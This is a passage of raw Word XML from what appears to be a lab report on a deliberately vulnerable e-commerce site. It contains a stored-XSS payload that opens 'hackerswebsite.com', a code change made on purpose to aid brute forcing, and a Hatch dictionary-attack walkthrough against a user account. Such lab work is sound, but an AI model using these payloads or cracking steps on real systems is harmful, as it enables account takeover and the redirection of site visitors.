        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:t>Web browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C210467" w14:textId="77777777" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METHODS UTILIZED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D735BB6" w14:textId="77777777" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9235D9" w14:textId="77777777" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:r w:rsidRPr="00B56C0A">
        <w:t>We are going to force all the users opening the website to also open hackers’ website. To do so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F5A2E" w14:textId="075104F7" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:t>Add a new product on the website or edit an existing one.</w:t>
      </w:r>
      <w:r w:rsidR="00C31234">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B56C0A">
        <w:t xml:space="preserve">The only part that matters is Name. You should fill it out with following code: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;script&gt;window.open(“http://hackerswebsite.com/”);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13610A" w14:textId="08BB6351" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA8DA98" wp14:editId="13CA9DAE">
            <wp:extent cx="5734050" cy="272415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email&#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4050" cy="2724150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="087E9DAB" w14:textId="77777777" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:r w:rsidRPr="00B56C0A">
        <w:t>In every other field you can put pretty much anything, as long as the fields expecting digits are getting digits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B90F7" w14:textId="1D51A94D" w:rsidR="00B56C0A" w:rsidRPr="00BC0215" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:t>Save your changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF76B6" w14:textId="653AF1EB" w:rsidR="00B56C0A" w:rsidRPr="00CA3121" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548DC781" w14:textId="5FD54C5D" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:r w:rsidRPr="00B56C0A">
        <w:t xml:space="preserve">Now when you open the main website you should get a pop-up leading to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://hackerswebsite.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B79DA" w14:textId="35B4805F" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34D6CE0A" wp14:editId="2294DC70">
            <wp:extent cx="5727700" cy="2311400"/>
            <wp:effectExtent l="0" t="0" r="635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7700" cy="2311400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EE7FCE" w14:textId="5D24D1FC" w:rsidR="00B56C0A" w:rsidRPr="00BC0215" w:rsidRDefault="00B56C0A" w:rsidP="00B56C0A">
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEWED BY:</w:t>
      </w:r>
      <w:r w:rsidR="00BC0215">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC0215" w:rsidRPr="00B56C0A">
        <w:t>Dan Anderson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03376652" w14:textId="77777777" w:rsidR="00BC0215" w:rsidRPr="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00BC0215">
      <w:r w:rsidRPr="00B56C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REVIEW OUTCOME:</w:t>
      </w:r>
      <w:r w:rsidR="00BC0215">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC0215" w:rsidRPr="00B56C0A">
        <w:t xml:space="preserve">Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0FDC85" w14:textId="2E3E501F" w:rsidR="00B56C0A" w:rsidRPr="00B56C0A" w:rsidRDefault="00BC0215" w:rsidP="00B56C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE122B" w14:textId="3741C1CD" w:rsidR="003001C2" w:rsidRPr="00CA3121" w:rsidRDefault="003001C2" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VULNERABILITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BRUTE FORCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F2AA84" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF540A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESEARCH UNDERTAKEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56847A32" w14:textId="6EED742C" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve">Pretty much any site can be vulnerable to brute force attack, so </w:t>
      </w:r>
      <w:r w:rsidR="002E52BB">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> goal here was to make it easier to perform the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350ADE7" w14:textId="43313810" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>After some research I</w:t>
      </w:r>
      <w:r w:rsidR="002E52BB">
        <w:t>t was</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> decided that dictionary attack would work well with our setup.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="00FF540A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.imperva.com/learn/application-security/brute-force-attack/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="392C3350" w14:textId="545C2E15" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="002E52BB" w:rsidP="00FF540A">
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> original website login is protected with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t>CSRF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> token, making it little bit more difficult to perform the attack using standard tools. If disabled the brute force attack could be done with any popular tool</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> like Hydra.</w:t>
      </w:r>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/5207160/what-is-a-csrf-token-what-is-its-importance-and-how-does-it-work</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FB946F9" w14:textId="6E23F6FC" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="002E52BB" w:rsidP="00FF540A">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> tool that might work well even with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t>CSRF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> token protection is Hatch. It takes control over chrome website and types in user and password from browser. Meaning that every attempt will seem like it’s made by a user and there will be a new token generated each time.</w:t>
      </w:r>
      <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidR="00FF540A" w:rsidRPr="00FF540A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Greatest125/Hatch-Python3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31E4A02A" w14:textId="793692CD" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>The way Hatch detects a positive attempt is a redirection from a login site, after a user is already logged in. At this point in time</w:t>
      </w:r>
      <w:r w:rsidR="002E52BB">
        <w:t xml:space="preserve"> the ecommerce</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> website doesn’t do that, but it’s really easy to implement.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId114" w:history="1">
        <w:r w:rsidRPr="00FF540A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/18596411/skip-login-page-if-session-exists</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AE13FB4" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A"/>
    <w:p w14:paraId="1E55AB11" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF540A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUGGESTED IMPLEMENTATION METHOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57907A60" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve">Change can be made to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>route.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> file at </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shop/customers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve"> where the login page is defined. Following two lines need to be added right after the login is defined:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB38E7D" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve">    if current_user.is_authenticated():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E348A" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t xml:space="preserve">        return redirect(url_for('home'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E277E2" w14:textId="68F82DA3" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB25F68" wp14:editId="67A207B9">
            <wp:extent cx="4962525" cy="22860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62525" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E0CB8" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>From now on whenever user is logged in, they won’t be able to access login page until they logout.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF540A">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAACCF" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF540A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FUNCTIONALITY TESTING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724635C" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>Do some light functionality testing just to show we care. Ensure infrastructure and site still operate properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0471F4" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>When logged in as a user I cannot access the customer login page anymore, until I logout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37945397" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>It is difficult to take a screenshot of being redirected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057994D" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF540A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA109D2" w14:textId="77777777" w:rsidR="00FF540A" w:rsidRPr="00FF540A" w:rsidRDefault="00FF540A" w:rsidP="00FF540A">
      <w:r w:rsidRPr="00FF540A">
        <w:t>So far everything works as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD64CB" w14:textId="51E5F161" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="005104F7" w:rsidP="00E01B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">BRUTE FORCE </w:t>
      </w:r>
      <w:r w:rsidR="00E01B85" w:rsidRPr="00E01B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY/EXPLOIT WALKTHROUGH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE721B6" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TOOLS REQUIRED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100543C6" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:t>Hatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505B1C3" w14:textId="12C2D9E1" w:rsidR="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:t>Python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D3B91" w14:textId="4EB2D1CC" w:rsidR="00846707" w:rsidRPr="00E01B85" w:rsidRDefault="00846707" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows 2012 VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36814D79" w14:textId="05792E67" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:t>Chromium</w:t>
      </w:r>
      <w:r w:rsidR="005104F7">
        <w:t xml:space="preserve"> browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1985E750" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METHODS UTILIZED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41079F0F" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:t xml:space="preserve">Get hatch for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E01B85">
        <w:t>python3</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E01B85">
        <w:t>. You can follow installation instructions at:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r w:rsidRPr="00E01B85">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Greatest125/Hatch-Python3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C6DE8BA" w14:textId="06793D0A" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:t>Run Hatch by opening the Hatch directory in your terminal and using following command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D309608" wp14:editId="2E86DA80">
            <wp:extent cx="5730875" cy="414655"/>
            <wp:effectExtent l="0" t="0" r="3175"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0875" cy="414655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F85FF15" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t xml:space="preserve">Replace the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:t xml:space="preserve"> with IP address of your website,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297CED3" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">bob.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:t>with name of the dictionary file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E65AC8" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00DF7185" w:rsidP="00E01B85">
      <w:hyperlink r:id="rId118" w:history="1">
        <w:r w:rsidR="00E01B85" w:rsidRPr="00E01B85">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>bob@projex.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E01B85" w:rsidRPr="00E01B85">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E01B85" w:rsidRPr="00E01B85">
        <w:t>with any other username you want to crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435743D" w14:textId="2D872916" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01B85">
        <w:t>This will start the program and open chromium browser.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:br/>
        <w:t>After a while you should see the results.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01B85">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB29C4B" wp14:editId="13DDAAB4">
            <wp:extent cx="5730875" cy="3335020"/>
            <wp:effectExtent l="0" t="0" r="317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0875" cy="3335020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B909E0" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:t>The correct password is the last one tried by Hatch, not the one it says it found. It can be easily changed in code, but I’m trying to avoid creating custom software with this attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC9551" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B90E16" w14:textId="77777777" w:rsidR="00E01B85" w:rsidRPr="00E01B85" w:rsidRDefault="00E01B85" w:rsidP="00E01B85">
      <w:r w:rsidRPr="00E01B85">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Another way of tackling this is using custom python script that will get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E01B85">
        <w:t>CSRF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E01B85">
        <w:t xml:space="preserve"> token for each password attempt. I used modified version of code from following website:</w:t>
